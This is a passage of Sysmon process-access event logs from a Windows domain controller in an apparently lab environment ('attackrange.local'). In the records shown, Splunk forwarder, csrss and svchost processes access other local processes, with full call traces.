Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B3-5F25-0000-00108C510600}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B3-5F25-0000-00108C510600}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B3-5F25-0000-00108C510600}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RP